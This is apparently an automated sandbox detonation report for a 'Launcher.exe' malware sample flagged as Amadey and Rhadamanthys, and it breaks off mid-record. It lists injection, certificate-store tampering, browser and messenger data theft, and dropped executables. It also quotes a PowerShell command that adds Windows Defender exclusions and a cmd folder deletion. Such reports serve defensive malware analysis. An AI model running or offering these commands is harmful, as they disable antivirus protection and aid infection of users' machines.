memory/4364-48-0x0000000072B60000-0x0000000073310000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:14
Platform
win11-20240426-en
Max time kernel
143s
Max time network
155s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1284 wrote to memory of 3080 | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1284 wrote to memory of 3080 | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1284 wrote to memory of 3080 | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1284 wrote to memory of 3912 | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1284 wrote to memory of 3912 | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1284 wrote to memory of 3912 | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 52.111.229.43:443 | tcp |
Files
memory/3080-0-0x000000007315E000-0x000000007315F000-memory.dmp
memory/3080-1-0x0000000002340000-0x0000000002376000-memory.dmp
memory/3080-2-0x0000000004E60000-0x000000000548A000-memory.dmp
memory/3080-3-0x0000000073150000-0x0000000073901000-memory.dmp
memory/3080-4-0x0000000004CB0000-0x0000000004CD2000-memory.dmp
memory/3080-6-0x0000000005670000-0x00000000056D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1bg0jyst.cup.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3080-15-0x0000000073150000-0x0000000073901000-memory.dmp
memory/3080-5-0x0000000005590000-0x00000000055F6000-memory.dmp
memory/3080-16-0x00000000056E0000-0x0000000005A37000-memory.dmp
memory/3080-17-0x0000000005B40000-0x0000000005B5E000-memory.dmp
memory/3080-18-0x0000000005B80000-0x0000000005BCC000-memory.dmp
memory/3080-19-0x0000000006D70000-0x0000000006DA4000-memory.dmp
memory/3080-21-0x000000006FBD0000-0x000000006FC1C000-memory.dmp
memory/3080-20-0x0000000073150000-0x0000000073901000-memory.dmp
memory/3080-30-0x0000000006140000-0x000000000615E000-memory.dmp
memory/3080-31-0x0000000006DB0000-0x0000000006E54000-memory.dmp
memory/3080-32-0x0000000073150000-0x0000000073901000-memory.dmp
memory/3080-33-0x0000000073150000-0x0000000073901000-memory.dmp
memory/3080-35-0x0000000006EB0000-0x0000000006ECA000-memory.dmp
memory/3080-34-0x00000000074F0000-0x0000000007B6A000-memory.dmp
memory/3080-36-0x0000000006F30000-0x0000000006F3A000-memory.dmp
memory/3080-37-0x0000000007180000-0x0000000007216000-memory.dmp
memory/3080-38-0x00000000070B0000-0x00000000070C1000-memory.dmp
memory/3080-39-0x00000000070F0000-0x00000000070FE000-memory.dmp
memory/3080-40-0x0000000007100000-0x0000000007115000-memory.dmp
memory/3080-41-0x0000000007140000-0x000000000715A000-memory.dmp
memory/3080-42-0x0000000007130000-0x0000000007138000-memory.dmp
memory/3080-45-0x0000000073150000-0x0000000073901000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:14
Platform
win10v2004-20240426-en
Max time kernel
142s
Max time network
158s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\appInfo\Zxph8ZShJw5c.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4fc 0x508
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.98.74.40.in-addr.arpa | udp |
Files
memory/5024-0-0x00007FFD22603000-0x00007FFD22605000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tny0noit.tx4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5024-10-0x0000025046F30000-0x0000025046F52000-memory.dmp
memory/5024-11-0x00007FFD22600000-0x00007FFD230C1000-memory.dmp
memory/5024-12-0x00007FFD22600000-0x00007FFD230C1000-memory.dmp
memory/5024-13-0x00007FFD22600000-0x00007FFD230C1000-memory.dmp
memory/5024-16-0x00007FFD22600000-0x00007FFD230C1000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:12
Platform
win11-20240426-en
Max time kernel
41s
Max time network
51s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.dll,#1
Network
| Country | Destination | Domain | Proto |
| GB | 104.86.110.90:443 | tcp | |
| US | 8.8.8.8:53 | browser.pipe.aria.microsoft.com | udp |
| US | 13.89.179.8:443 | browser.pipe.aria.microsoft.com | tcp |
| NL | 23.62.61.194:443 | r.bing.com | tcp |
| NL | 23.62.61.194:443 | r.bing.com | tcp |
| NL | 23.62.61.194:443 | r.bing.com | tcp |
| NL | 23.62.61.194:443 | r.bing.com | tcp |
| NL | 23.62.61.194:443 | r.bing.com | tcp |
| NL | 23.62.61.194:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:14
Platform
win10v2004-20240426-en
Max time kernel
132s
Max time network
154s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:14
Platform
win11-20240508-en
Max time kernel
101s
Max time network
129s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:12
Platform
win11-20240508-en
Max time kernel
59s
Max time network
73s
Command Line
Signatures
Amadey
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2604 created 2536 | N/A | C:\Users\Admin\AppData\Roaming\services\plugin4559 | C:\Windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin29017 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin29017 | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Dctooux.job | C:\Users\Admin\AppData\Roaming\services\3plugin14170 | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin4559 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin29017 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin14170 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Enumerates physical storage devices
Program crash
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0280f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e92